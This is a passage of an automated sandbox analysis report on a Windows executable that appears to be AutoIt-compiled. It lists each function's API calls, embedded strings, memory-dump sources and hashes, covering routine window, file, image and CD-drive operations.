                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$Info
                                                                          • String ID:
                                                                          • API String ID: 2577412497-0
                                                                          • Opcode ID: 5c5ac80421ae372737e18d28f45b30a8223590094b5e28b424d717dfa7a3c719
                                                                          • Instruction ID: 24cded75b5fd913dae5db1d67b67beffbcbc0c301b4856282c597b14903f6828
                                                                          • Opcode Fuzzy Hash: 5c5ac80421ae372737e18d28f45b30a8223590094b5e28b424d717dfa7a3c719
                                                                          • Instruction Fuzzy Hash: 743103B1D4831D6ADF119FB68C899AFBFE8FF04750F50456AA50DE7280DA78A5008F91
                                                                          Function 0039A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0039A259
                                                                          • DestroyWindow.USER32(?,?), ref: 0039A2D3
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0039A34D
                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0039A36F
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039A382
                                                                          • DestroyWindow.USER32(00000000), ref: 0039A3A4
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00310000,00000000), ref: 0039A3DB
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039A3F4
                                                                          • GetDesktopWindow.USER32 ref: 0039A40D
                                                                          • GetWindowRect.USER32(00000000), ref: 0039A414
                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0039A42C
                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0039A444
                                                                            • Part of subcall function 003125DB: GetWindowLongW.USER32(?,000000EB), ref: 003125EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                          • String ID: 0$tooltips_class32
                                                                          • API String ID: 1297703922-3619404913
                                                                          • Opcode ID: 8729a39dfeee6941b66c816d06b5b40e8b8591b3f7ac94b255ebce3404135b76
                                                                          • Instruction ID: 18b855b39b10bf9262babe8f9519952bf3cf4bd870cbeced63197528ed909e46
                                                                          • Opcode Fuzzy Hash: 8729a39dfeee6941b66c816d06b5b40e8b8591b3f7ac94b255ebce3404135b76
                                                                          • Instruction Fuzzy Hash: 2671AF75140705AFDB26CF28CC49FA677E9FB89300F05461DF9858B2A0D771E942DB92
                                                                          Function 00394392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00394424
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0039446F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: cb47004aedca5354eef2bc6bbc0a82b20b5a3692a41424a8d812c7799c1725d4
                                                                          • Instruction ID: 5633ad1916a4e73a46756bd97439bec3a340137482378d2828ac61359d6f6b09
                                                                          • Opcode Fuzzy Hash: cb47004aedca5354eef2bc6bbc0a82b20b5a3692a41424a8d812c7799c1725d4
                                                                          • Instruction Fuzzy Hash: 74915E752043019FCB0AEF10C461BAEB7E5AF99354F05846DF8965B7A2CB31ED4ACB81
                                                                          Function 0039B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0039B8B4
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00396B11,?), ref: 0039B910
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0039B949
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0039B98C
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0039B9C3
                                                                          • FreeLibrary.KERNEL32(?), ref: 0039B9CF
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039B9DF
                                                                          • DestroyIcon.USER32(?), ref: 0039B9EE
                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0039BA0B
                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0039BA17
                                                                            • Part of subcall function 00332EFD: __wcsicmp_l.LIBCMT ref: 00332F86
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                          • String ID: .dll$.exe$.icl
                                                                          • API String ID: 1212759294-1154884017
                                                                          • Opcode ID: 7b4b50bf3428674c85c387a2849d1dfd8ab55482cabfedae95f1cf7b837f739f
                                                                          • Instruction ID: 60981bce6e2c985fcd06b2c7b041775ca67c036108e63a5ea5bf1d93f8e495f6
                                                                          • Opcode Fuzzy Hash: 7b4b50bf3428674c85c387a2849d1dfd8ab55482cabfedae95f1cf7b837f739f
                                                                          • Instruction Fuzzy Hash: 0C61D071900219BEEF16DF64DD85FBEB7ACEB08710F10421AF915DA1C0DB75A990D7A0
                                                                          Function 0037DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 0037DCDC
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0037DCEC
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0037DCF8
                                                                          • __wsplitpath.LIBCMT ref: 0037DD56
                                                                          • _wcscat.LIBCMT ref: 0037DD6E
                                                                          • _wcscat.LIBCMT ref: 0037DD80
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037DD95
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DDA9
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DDDB
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DDFC
                                                                          • _wcscpy.LIBCMT ref: 0037DE08
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037DE47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 3566783562-438819550
                                                                          • Opcode ID: 895e2cddbb3f42b0d05c5dc2fa1945b4c789f3c1e994ea9779383fca08ffb0ee
                                                                          • Instruction ID: 016a85f69526c86357ec1b979ba842b6d3eb0e629a7272c87abe62bd3a06119f
                                                                          • Opcode Fuzzy Hash: 895e2cddbb3f42b0d05c5dc2fa1945b4c789f3c1e994ea9779383fca08ffb0ee
                                                                          • Instruction Fuzzy Hash: A3617F765042059FCB22EF20C854A9EB3F8FF89310F04891EF999CB251DB75E945CB51
                                                                          Function 00379C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00379C7F
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00379CA0
                                                                          • __swprintf.LIBCMT ref: 00379CF9
                                                                          • __swprintf.LIBCMT ref: 00379D12
                                                                          • _wprintf.LIBCMT ref: 00379DB9
                                                                          • _wprintf.LIBCMT ref: 00379DD7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 311963372-3080491070
                                                                          • Opcode ID: 4b6f60d398f07addc94924666b06198dc2f72963b02a83c741e797b9587dfa37
                                                                          • Instruction ID: ff17e799d9d737d44160e254eb9c70deb75ac8de7863bd496d5493ebb02da500
                                                                          • Opcode Fuzzy Hash: 4b6f60d398f07addc94924666b06198dc2f72963b02a83c741e797b9587dfa37
                                                                          • Instruction Fuzzy Hash: ED519632900509AECF1BEBE0DD46EEEB778AF08300F144566F509B6061EB352F99CB51
                                                                          Function 0037A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0037A3CB
                                                                          • GetDriveTypeW.KERNEL32 ref: 0037A418
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037A460
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037A497
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037A4C5
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 2698844021-4113822522
                                                                          • Opcode ID: bf9e61198b8f39abd156ea9f30534f645094dd9d17779ea6163d8c5f80d1f820
                                                                          • Instruction ID: b0152edbfca48d0632e69ddc58e3c85c3d3b7dbc5970b91a5cf11a61d31b759b
                                                                          • Opcode Fuzzy Hash: bf9e61198b8f39abd156ea9f30534f645094dd9d17779ea6163d8c5f80d1f820
                                                                          • Instruction Fuzzy Hash: 29514E751086059FC716EF11C891DAEB3F8EF88718F04885DF8999B261DB31EE45CB52
                                                                          Function 0036F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0034E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0036F8DF
                                                                          • LoadStringW.USER32(00000000,?,0034E029,00000001), ref: 0036F8E8
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0034E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0036F90A
                                                                          • LoadStringW.USER32(00000000,?,0034E029,00000001), ref: 0036F90D
                                                                          • __swprintf.LIBCMT ref: 0036F95D
                                                                          • __swprintf.LIBCMT ref: 0036F96E
                                                                          • _wprintf.LIBCMT ref: 0036FA17
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0036FA2E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 984253442-2268648507
                                                                          • Opcode ID: 32c99c99fb14b21e9dae043c466a0f35df4a433053f0c92f5a1c4031c3b7acbc
                                                                          • Instruction ID: a6a2d2366a5d33605cdaeb1513cf8934bc4f20a6babf25c0b9aafd91f11b0ffc
                                                                          • Opcode Fuzzy Hash: 32c99c99fb14b21e9dae043c466a0f35df4a433053f0c92f5a1c4031c3b7acbc
                                                                          • Instruction Fuzzy Hash: 1D41217280410DAACB0AFBE0DD86DEE777CAF58300F144465F505BA095EB316F59CB61
                                                                          Function 0039BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0039BA56
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0039BA6D
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0039BA78
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0039BA85
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0039BA8E
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0039BA9D
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0039BAA6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0039BAAD
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0039BABE
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,003A2CAC,?), ref: 0039BAD7
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0039BAE7
                                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 0039BB0B
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0039BB36
                                                                          • DeleteObject.GDI32(00000000), ref: 0039BB5E
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0039BB74
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3840717409-0
                                                                          • Opcode ID: f58222d46f3f80320c006916ba0810d512036132520e239f8633fdd12ff90f8f
                                                                          • Instruction ID: 244aec58f916168e203c0aa51d2b149317953ad4b5cfc12d4b1cadc4c7a2d5b0
                                                                          • Opcode Fuzzy Hash: f58222d46f3f80320c006916ba0810d512036132520e239f8633fdd12ff90f8f
                                                                          • Instruction Fuzzy Hash: E4412775600208EFDB129F65ED88EAABBBDFF89711F104069F949D72A0D7719E01CB60
                                                                          Function 0037D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 0037DA10
                                                                          • _wcscat.LIBCMT ref: 0037DA28
                                                                          • _wcscat.LIBCMT ref: 0037DA3A
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037DA4F
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DA63
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0037DA7B
                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0037DA95
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DAA7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                          • String ID: *.*
                                                                          • API String ID: 34673085-438819550
                                                                          • Opcode ID: 8f1d92521ce38e12c567ec8e2324945d8166c3c0bd7179400322150447e2a4a9
                                                                          • Instruction ID: 84a732300028c7788752e338d13582966379bc8b98ebf5226c9473ce0e25705e
                                                                          • Opcode Fuzzy Hash: 8f1d92521ce38e12c567ec8e2324945d8166c3c0bd7179400322150447e2a4a9
                                                                          • Instruction Fuzzy Hash: DD8173715042419FCB75DF64C844AAAB7F8BF8A310F19882EF98DCB251D738D945CB52
                                                                          Function 0039C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0039C1FC
                                                                          • GetFocus.USER32 ref: 0039C20C
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0039C217
                                                                          • _memset.LIBCMT ref: 0039C342
                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0039C36D
                                                                          • GetMenuItemCount.USER32(?), ref: 0039C38D
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0039C3A0
                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0039C3D4
                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0039C41C
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0039C454
                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0039C489
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1296962147-4108050209
                                                                          • Opcode ID: bcc44602a42579d6dcdc674e7fdd08a81324c7dbd57902a9c520621e2c4a2579
                                                                          • Instruction ID: 9ab330ff3be03647a0f4bab7aad6fec88be41ee284102ac43a940bfe3712b7b0
                                                                          • Opcode Fuzzy Hash: bcc44602a42579d6dcdc674e7fdd08a81324c7dbd57902a9c520621e2c4a2579
                                                                          • Instruction Fuzzy Hash: 5981A971218301AFDB13DF25D894AABBBE8FB88314F11592EF99597291C731D904CBA2
                                                                          Function 0038731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0038738F
                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0038739B
                                                                          • CreateCompatibleDC.GDI32(?), ref: 003873A7
                                                                          • SelectObject.GDI32(00000000,?), ref: 003873B4
                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00387408
                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00387444
                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00387468
                                                                          • SelectObject.GDI32(00000006,?), ref: 00387470
                                                                          • DeleteObject.GDI32(?), ref: 00387479
                                                                          • DeleteDC.GDI32(00000006), ref: 00387480
                                                                          • ReleaseDC.USER32(00000000,?), ref: 0038748B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                          • String ID: (
                                                                          • API String ID: 2598888154-3887548279
                                                                          • Opcode ID: 8018eee83a69c43afdde6644060d10c74c7a4b458d30441a58d0ee7437579a04
                                                                          • Instruction ID: 1fcff1c5353d354def59b2f7fbb906dd0ac16f77c5ced25a166e4be427c536ee
                                                                          • Opcode Fuzzy Hash: 8018eee83a69c43afdde6644060d10c74c7a4b458d30441a58d0ee7437579a04
                                                                          • Instruction Fuzzy Hash: 3E513875904309EFCB16DFA9CC85EAEBBB9EF48310F24846AF959D7211C771A9408B90
                                                                          Function 00316A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00330957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00316B0C,?,00008000), ref: 00330973
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00316BAD
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00316CFA
                                                                            • Part of subcall function 0031586D: _wcscpy.LIBCMT ref: 003158A5
                                                                            • Part of subcall function 0033363D: _iswctype.LIBCMT ref: 00333645
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
